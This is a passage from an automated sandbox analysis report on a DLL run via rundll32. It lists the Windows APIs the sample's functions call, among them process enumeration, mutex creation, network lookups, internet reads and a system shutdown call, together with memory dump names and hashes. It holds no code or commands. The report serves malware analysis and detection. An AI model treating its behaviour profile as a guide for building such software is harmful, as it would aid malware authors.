                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateMutex
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1964310414-0
                                                                                                                                            • Opcode ID: f03030767440787e5e8ee563cbeb237b89049fd46284869140ae0419c91515a8
                                                                                                                                            • Instruction ID: 0bba5641deb9fc7c6708226b57f3740a3060a6e77b98bc1f4937df3feb83fb0f
                                                                                                                                            • Opcode Fuzzy Hash: f03030767440787e5e8ee563cbeb237b89049fd46284869140ae0419c91515a8
                                                                                                                                            • Instruction Fuzzy Hash: 51B0093A408220BFDF025F90DD4880ABBA2BB88362F24C958F6A941031C7328420EB02
                                                                                                                                            Function 10003FF7 Relevance: 1.5, APIs: 1, Instructions: 5COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetShortPathNameA.KERNEL32(?,?,?), ref: 10004003
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4676345905.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                            • Associated: 00000003.00000002.4676314345.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676377100.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676411221.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676446379.000000001001E000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676481266.000000001003D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676516295.000000001004F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: NamePathShort
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1295925010-0
                                                                                                                                            • Opcode ID: b2e0d57d01f7aa481c28775ec103b2c79e6903a2f37fda92ba0980fa6487b9be
                                                                                                                                            • Instruction ID: 299f2b121c0b8d63d2f16659a91a8a26a6eb1e7383ee0b7c2fbbf344de06ce20
                                                                                                                                            • Opcode Fuzzy Hash: b2e0d57d01f7aa481c28775ec103b2c79e6903a2f37fda92ba0980fa6487b9be
                                                                                                                                            • Instruction Fuzzy Hash: BCB0097A509210BFDF025B91DE4880ABBA2AB89321F10C958F2A940031C7328520EB12
                                                                                                                                            Function 10004104 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • Process32First.KERNEL32(00000000,00000000), ref: 1000410C
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4676345905.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                            • Associated: 00000003.00000002.4676314345.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676377100.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676411221.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676446379.000000001001E000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676481266.000000001003D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676516295.000000001004F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FirstProcess32
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2623510744-0
                                                                                                                                            • Opcode ID: 4be810b948c5642b78a3303991c31d5753e2f497cabb41971bfbf009a223d646
                                                                                                                                            • Instruction ID: d0469a6573cf8832cc4e791a541241725128130187f64684ac8c75673cb250d8
                                                                                                                                            • Opcode Fuzzy Hash: 4be810b948c5642b78a3303991c31d5753e2f497cabb41971bfbf009a223d646
                                                                                                                                            • Instruction Fuzzy Hash: B8A00176509612ABDA42AB51CE4884ABEA2FBA8381F01C819F18940434CB3284A5EB12
                                                                                                                                            Function 1000400A Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetDriveTypeA.KERNEL32(?,1000824C,10015940), ref: 1000400E
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4676345905.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                            • Associated: 00000003.00000002.4676314345.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676377100.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676411221.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676446379.000000001001E000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676481266.000000001003D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676516295.000000001004F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: DriveType
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 338552980-0
                                                                                                                                            • Opcode ID: 2ee3dedfe077572030ca3591167bf26a544b4eb7bba9e94adf73c1260513ac4d
                                                                                                                                            • Instruction ID: e310fc801df329cbdffcf5e880badee8d9e0b58f708c6ac467addbfbb1e58057
                                                                                                                                            • Opcode Fuzzy Hash: 2ee3dedfe077572030ca3591167bf26a544b4eb7bba9e94adf73c1260513ac4d
                                                                                                                                            • Instruction Fuzzy Hash: 029002305055119BDE015B10CE4940A7E71AB84701B00C4A4E04541130C7328810EE01
                                                                                                                                            Function 10004092 Relevance: 1.5, APIs: 1, Instructions: 3registryCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • RegCloseKey.KERNEL32(?,10006DBE,?), ref: 10004096
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4676345905.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                            • Associated: 00000003.00000002.4676314345.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676377100.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676411221.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676446379.000000001001E000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676481266.000000001003D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676516295.000000001004F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Close
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3535843008-0
                                                                                                                                            • Opcode ID: 2d988dbd5b15decafcf846d532543195a702f6c68f6a27351b5815321025a744
                                                                                                                                            • Instruction ID: c461232d01f39555025ee1551a6f08c036cd225bd5518e59674b318f5e785400
                                                                                                                                            • Opcode Fuzzy Hash: 2d988dbd5b15decafcf846d532543195a702f6c68f6a27351b5815321025a744
                                                                                                                                            • Instruction Fuzzy Hash: 799002705055119BDE415B11CF494097AA5AB84701B008458E04A41030C7318810EA01
                                                                                                                                            Function 10003EB4 Relevance: 1.5, APIs: 1, Instructions: 3networkCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • gethostbyname.WS2_32(00000000), ref: 10003EB8
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4676345905.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                            • Associated: 00000003.00000002.4676314345.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676377100.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676411221.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676446379.000000001001E000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676481266.000000001003D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676516295.000000001004F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: gethostbyname
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 930432418-0
                                                                                                                                            • Opcode ID: dcfbcd4351272649fb1253f470343220905ed4c20dbbca1a40d0a1126bf3fd71
                                                                                                                                            • Instruction ID: ddc175de635f80408d7ee48a1059bf0ffdd1ba2c9e36570999931cb834b2f0bc
                                                                                                                                            • Opcode Fuzzy Hash: dcfbcd4351272649fb1253f470343220905ed4c20dbbca1a40d0a1126bf3fd71
                                                                                                                                            • Instruction Fuzzy Hash: F7900270545110ABDE015B21CF4A4097A61AB85B01B048454E14940031C7318810EA12
                                                                                                                                            Function 10003F58 Relevance: 1.5, APIs: 1, Instructions: 3networkCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • InternetCloseHandle.WININET(000000FF), ref: 10003F5C
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4676345905.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                            • Associated: 00000003.00000002.4676314345.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676377100.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676411221.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676446379.000000001001E000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676481266.000000001003D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676516295.000000001004F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CloseHandleInternet
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1081599783-0
                                                                                                                                            • Opcode ID: 8d0e7f3340f86714890c3e5e57ace766e80008fe382fb5a6cdacf87e5adc2a77
                                                                                                                                            • Instruction ID: 28d98f4ef2c514375b8ebea010dbda7bec799427eab40d5dd6f08137a7235d83
                                                                                                                                            • Opcode Fuzzy Hash: 8d0e7f3340f86714890c3e5e57ace766e80008fe382fb5a6cdacf87e5adc2a77
                                                                                                                                            • Instruction Fuzzy Hash: EB9002304041149BDE015B10CF494097A71BB85B05B108454E04541030C7318810EA01
                                                                                                                                            Function 10003F72 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • PathFileExistsA.SHLWAPI(00080000,10005C92,?,?,%s\lang.ini,C:\Users\user\Desktop,?,00000000,00080000), ref: 10003F76
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4676345905.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                            • Associated: 00000003.00000002.4676314345.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676377100.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676411221.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676446379.000000001001E000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676481266.000000001003D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676516295.000000001004F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ExistsFilePath
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1174141254-0
                                                                                                                                            • Opcode ID: 6dc1e466dda3ac71b59e7395498c1fa1529f77b3beb14a38e7d5df6994b7eb4f
                                                                                                                                            • Instruction ID: df56204a28902bd86cd8e7b59e1535f4ff11cbe2af3c274bf077f84441daad3a
                                                                                                                                            • Opcode Fuzzy Hash: 6dc1e466dda3ac71b59e7395498c1fa1529f77b3beb14a38e7d5df6994b7eb4f
                                                                                                                                            • Instruction Fuzzy Hash: 869002705051109BDF015B11CF494497A65AB84701B00855CF05A41431C7318910EA01

                                                                                                                                            Non-executed Functions

                                                                                                                                            Function 1000B224 Relevance: 1.6, Strings: 1, Instructions: 400COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4676345905.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                            • Associated: 00000003.00000002.4676314345.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676377100.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676411221.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676446379.000000001001E000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676481266.000000001003D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676516295.000000001004F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: K
                                                                                                                                            • API String ID: 0-856455061
                                                                                                                                            • Opcode ID: 2579a251d1a9acc8374f22f67a4bb7b2891299b7fe2be1df8caa295a5f0ee3c9
                                                                                                                                            • Instruction ID: 6c5504f13a17a8b4553fb93f6e314e3eb43bbcef24ba1366296fc093faca9512
                                                                                                                                            • Opcode Fuzzy Hash: 2579a251d1a9acc8374f22f67a4bb7b2891299b7fe2be1df8caa295a5f0ee3c9
                                                                                                                                            • Instruction Fuzzy Hash: 13D1F2311046896EDB21CFAC8C80EFFBBBCAF4AA40F840549FD85CB642D555E92DA771
                                                                                                                                            Function 1000AEC0 Relevance: 1.5, Strings: 1, Instructions: 266COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4676345905.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                            • Associated: 00000003.00000002.4676314345.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676377100.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676411221.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676446379.000000001001E000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676481266.000000001003D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676516295.000000001004F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: K
                                                                                                                                            • API String ID: 0-856455061
                                                                                                                                            • Opcode ID: 40533ac75a34c0e28785cd811d3dcb55fe45dda3d4d2e35189a70ffc9c8f5c8e
                                                                                                                                            • Instruction ID: a9c7f45465d92fcd6248bf8d3b75336943ce7982e690b294f387925eaf45448f
                                                                                                                                            • Opcode Fuzzy Hash: 40533ac75a34c0e28785cd811d3dcb55fe45dda3d4d2e35189a70ffc9c8f5c8e
                                                                                                                                            • Instruction Fuzzy Hash: 6F9143311046896EDB21CFAD8C80EFFBBBCAF06A40F840549FE85C7642D255E92DA771
                                                                                                                                            Function 10003F41 Relevance: 1.5, APIs: 1, Instructions: 6filenetworkCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • InternetReadFile.WININET(?,?,?,?), ref: 10003F51
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4676345905.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                            • Associated: 00000003.00000002.4676314345.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676377100.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676411221.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676446379.000000001001E000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676481266.000000001003D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676516295.000000001004F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FileInternetRead
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 778332206-0
                                                                                                                                            • Opcode ID: 17794e789735475d89bbd1f9c593eb9d99e0ec2b66a06d8a24d179cffc3f724c
                                                                                                                                            • Instruction ID: 66c4406e5843dae4aa23aa47ff20fa86481cf42106c3819bfbf8a2f6b8e79ef1
                                                                                                                                            • Opcode Fuzzy Hash: 17794e789735475d89bbd1f9c593eb9d99e0ec2b66a06d8a24d179cffc3f724c
                                                                                                                                            • Instruction Fuzzy Hash: 20B00872519392ABDF02DF91CD4482ABAA6BB89301F084C5CF2A540071C7328428EB02
                                                                                                                                            Function 10003F63 Relevance: 1.5, APIs: 1, Instructions: 4shutdownCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • ExitWindowsEx.USER32(000000BC,000000BC), ref: 10003F6B
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4676345905.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                            • Associated: 00000003.00000002.4676314345.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676377100.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676411221.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676446379.000000001001E000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676481266.000000001003D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676516295.000000001004F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ExitWindows
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1089080001-0
                                                                                                                                            • Opcode ID: ddd05c4d22fa51185853cbc8baa1bf28f6a18d545d76c7cc1a4f4cf3c1112b8e
                                                                                                                                            • Instruction ID: a0a7e03ceb7acd9bb0d3454ea8bb5ca0f40435505fc546ba40186378cb909d0a
                                                                                                                                            • Opcode Fuzzy Hash: ddd05c4d22fa51185853cbc8baa1bf28f6a18d545d76c7cc1a4f4cf3c1112b8e
                                                                                                                                            • Instruction Fuzzy Hash: 81A00175509222EBDE025B51CE4888ABEA6AB88381F008858F28940031C77284A2EB02
                                                                                                                                            Function 100121ED Relevance: 1.5, Strings: 1, Instructions: 216COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4676411221.0000000010012000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                            • Associated: 00000003.00000002.4676314345.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676345905.0000000010001000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676377100.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676446379.000000001001E000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676481266.000000001003D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676516295.000000001004F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: '
                                                                                                                                            • API String ID: 0-1997036262
                                                                                                                                            • Opcode ID: caccb626b00a962d49a4d86a0300a1125d2220d93bea72919c028e0ffa6b786b
                                                                                                                                            • Instruction ID: f389f15fd0a8877f73eb6a91fb6ffbaafb7a2d8a217a3cbe01a0a4cb358a3832
                                                                                                                                            • Opcode Fuzzy Hash: caccb626b00a962d49a4d86a0300a1125d2220d93bea72919c028e0ffa6b786b
                                                                                                                                            • Instruction Fuzzy Hash: 5581276940E3D19FC7438B785CF91823FA2AE1B24434F09DAC4C09F4B7E1995D49C7A2
                                                                                                                                            Function 1000B70D Relevance: .1, Instructions: 104COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4676345905.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                            • Associated: 00000003.00000002.4676314345.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676377100.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676411221.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676446379.000000001001E000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676481266.000000001003D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676516295.000000001004F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 5eebda9e14e432eb1eff53421c5c1b8c098bdb1a5ff6e099d7d67764739a7ad5
                                                                                                                                            • Instruction ID: 9e0b5d620d62c11970e9cc848d1ca02f4ed839136e4bfa4bb83daef4b24ba54e
                                                                                                                                            • Opcode Fuzzy Hash: 5eebda9e14e432eb1eff53421c5c1b8c098bdb1a5ff6e099d7d67764739a7ad5
                                                                                                                                            • Instruction Fuzzy Hash: AA313A33E2C6B607E324DF7E4C84025F7D6EB8A06275A8779DE88E7255D128EC518BD0
                                                                                                                                            Function 10008AAD Relevance: .0, Instructions: 32COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4676345905.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                            • Associated: 00000003.00000002.4676314345.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676377100.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676411221.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676446379.000000001001E000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676481266.000000001003D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676516295.000000001004F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: e333d78722ad0821d4e98b6652e5a75445b5621be3666c330cc0561f1e3ae06e
                                                                                                                                            • Instruction ID: 9deb1ace0ade157a7cf376dc79b16b2541233208deadd1a3cef8bf08dc3f5488
                                                                                                                                            • Opcode Fuzzy Hash: e333d78722ad0821d4e98b6652e5a75445b5621be3666c330cc0561f1e3ae06e
                                                                                                                                            • Instruction Fuzzy Hash: 43F0682128E3C15DE30186685441BC1FF846B76314F0CC7CDB1D40B283C1954084CBA6
                                                                                                                                            Function 1001E1FE Relevance: .0, Instructions: 30COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4676446379.000000001001E000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                            • Associated: 00000003.00000002.4676314345.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676345905.0000000010001000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676377100.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676411221.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676481266.000000001003D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676516295.000000001004F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 12b9005d6082dbdac1a2845a9fd333a3e7a79171a5b874446ea0314262c5ac30
                                                                                                                                            • Instruction ID: f0cb1bca0584f7cb9865d2b0003cd1252f49916ae924d73bcd8c513b2b9b2d6d
                                                                                                                                            • Opcode Fuzzy Hash: 12b9005d6082dbdac1a2845a9fd333a3e7a79171a5b874446ea0314262c5ac30
                                                                                                                                            • Instruction Fuzzy Hash: 11E0E5A440C38AFEC703AB3488840E93FA6EE91310F04840CF4C403A02E3B589A09332
                                                                                                                                            Function 1000720E Relevance: 28.4, APIs: 6, Strings: 10, Instructions: 366COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • SafeArrayCreate.OLEAUT32(00000008,00000001,?), ref: 10007338
                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 1000734D
                                                                                                                                            • SafeArrayCreate.OLEAUT32(00000003,00000001,?), ref: 10007368
                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 10007377
                                                                                                                                              • Part of subcall function 10007A62: VariantInit.OLEAUT32(?), ref: 10007AA1
                                                                                                                                            • SafeArrayCreate.OLEAUT32(00000008,00000001,00000002), ref: 10007505
                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 10007513
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
